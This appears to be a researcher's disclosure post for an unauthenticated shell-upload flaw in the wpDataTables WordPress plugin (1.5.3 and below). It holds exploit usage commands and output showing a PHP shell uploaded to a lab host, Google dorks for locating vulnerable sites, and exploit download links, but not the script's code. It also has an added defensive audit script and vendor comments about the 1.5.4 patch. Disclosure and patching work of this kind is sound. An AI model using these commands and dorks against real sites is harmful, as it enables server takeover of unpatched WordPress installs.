WordPress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability


claudio@backbox3:~/claudio$ python wpdatatables_shell_up.py -t http://10.0.0.67/wordpress -f shell.php

   ___ ___               __                                                         
  |   Y   .-----.----.--|  .-----.----.-----.-----.-----.                           
  |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|                           
  |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|                           
  |:      |                |__|                                                     
  |::.|:. |                                                                         
  `--- ---'                                                                         
         ___ ___       ______         __         _______       __    __                
        |   Y   .-----|   _  \ .---.-|  |_.---.-|       .---.-|  |--|  .-----.-----.   
        |.  |   |  _  |.  |   \|  _  |   _|  _  |.|   | |  _  |  _  |  |  -__|__ --|   
        |. / \  |   __|.  |    |___._|____|___._`-|.  |-|___._|_____|__|_____|_____|   
        |:      |__|  |:  1    /                  |:  |                                
        |::.|:. |     |::.. . /                   |::.|                                
        `--- ---'     `------'                    `---'                                
                                                 
                                                        Sh311 Upl04d Vuln3r4b1l1ty 
                                                                <= 1.5.3

                                   Written by:

                                 Claudio Viviani

                               http://www.homelab.it

                                 info@homelab.it
                             homelabit@protonmail.ch

                        https://www.facebook.com/homelabit
                          https://twitter.com/homelabit
                          https://plus.google.com/+HomelabIt1/
               https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

[!] Shell Uploaded
[!] Location: http://10.0.0.67/wordpress/wp-content/uploads/2014/11/shell.php
claudio@backbox3:~/claudio$
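
For site owners, a local check of a WordPress install, as an added example that is not part of the original post or the exploit script: it reads the installed plugin version and lists server-executable files under `wp-content/uploads`, the location shown in the output above. The plugin directory name `wpdatatables` is an assumption taken from the dork below and may differ per install; the function names are hypothetical.

```python
import os
import re

PATCHED = (1, 5, 4)  # first fixed release, per the vendor's comment on this page
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
VERSION_HDR = re.compile(r"^[ \t/*#@]*Version:\s*([0-9]+(?:\.[0-9]+)*)", re.MULTILINE)


def parse_version(text):
    """Turn '1.5.3' into (1, 5, 3), padded so '1.5' compares as (1, 5, 0)."""
    parts = [int(p) for p in text.split(".")]
    return tuple(parts + [0] * (3 - len(parts)))


def plugin_version(plugin_dir):
    """Read the 'Version:' plugin header from any top-level .php file."""
    for name in sorted(os.listdir(plugin_dir)):
        if not name.lower().endswith(".php"):
            continue
        # WordPress itself only reads the first 8 KB when parsing plugin headers.
        with open(os.path.join(plugin_dir, name), errors="replace") as fh:
            match = VERSION_HDR.search(fh.read(8192))
        if match:
            return parse_version(match.group(1))
    return None


def is_vulnerable(version):
    """True for any known version below the patched release."""
    return version is not None and version < PATCHED


def scripts_in_uploads(uploads_dir):
    """List server-executable files under wp-content/uploads."""
    hits = []
    for root, _dirs, files in os.walk(uploads_dir):
        hits += [os.path.join(root, f) for f in files if SCRIPT_EXT.search(f)]
    return sorted(hits)


def audit(wp_root, plugin_slug="wpdatatables"):  # slug is an assumption
    content = os.path.join(wp_root, "wp-content")
    plugin_dir = os.path.join(content, "plugins", plugin_slug)
    version = plugin_version(plugin_dir) if os.path.isdir(plugin_dir) else None
    return {
        "version": version,
        "vulnerable": is_vulnerable(version),
        "uploaded_scripts": scripts_in_uploads(os.path.join(content, "uploads")),
    }
```

Call `audit("/path/to/wordpress")` on the server; any entry in `uploaded_scripts` deserves review, since the media library has no reason to hold PHP files.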

Google Dork WordPress WpDataTables

inurl:/plugins/wpdatatables
inurl:codecanyon-3958969
index of "wpdatatables"
index of "codecanyon-3958969"

Download

Download:
         wpdatatables_shell_up.py
         wpdatatables_shell_up.py (Mega Mirror)

Exploit Usage

claudio@backbox3:~$ python wpdatatables_shell_up.py -t http[s]://localhost[:PORT] -f filename
                    python wpdatatables_shell_up.py -t http[s]://localhost[:PORT]/basedir -f filename
  • wpDataTables

    Hi,

    We released a patch where this problem is solved.
    Thank you for pointing out the vulnerability; we would be really grateful if you would remove this post.

    • ryan

      What version is the patched one?

      • 1.5.4 version

        • ryan

          Thanks! Added to wpvulndb!

          • ok! Thank you!

          • ryan, if I create the list, can you add the homelab URL links of my old exploits archived on wpvulndb?

          • ryan

            Sure! If you could add the list here – https://github.com/wpscanteam/vulndb/issues – we’ll pick up on them and add them to wpvulndb, or just email me the list.

          • Thank you Ryan! I sent the e-mail 😉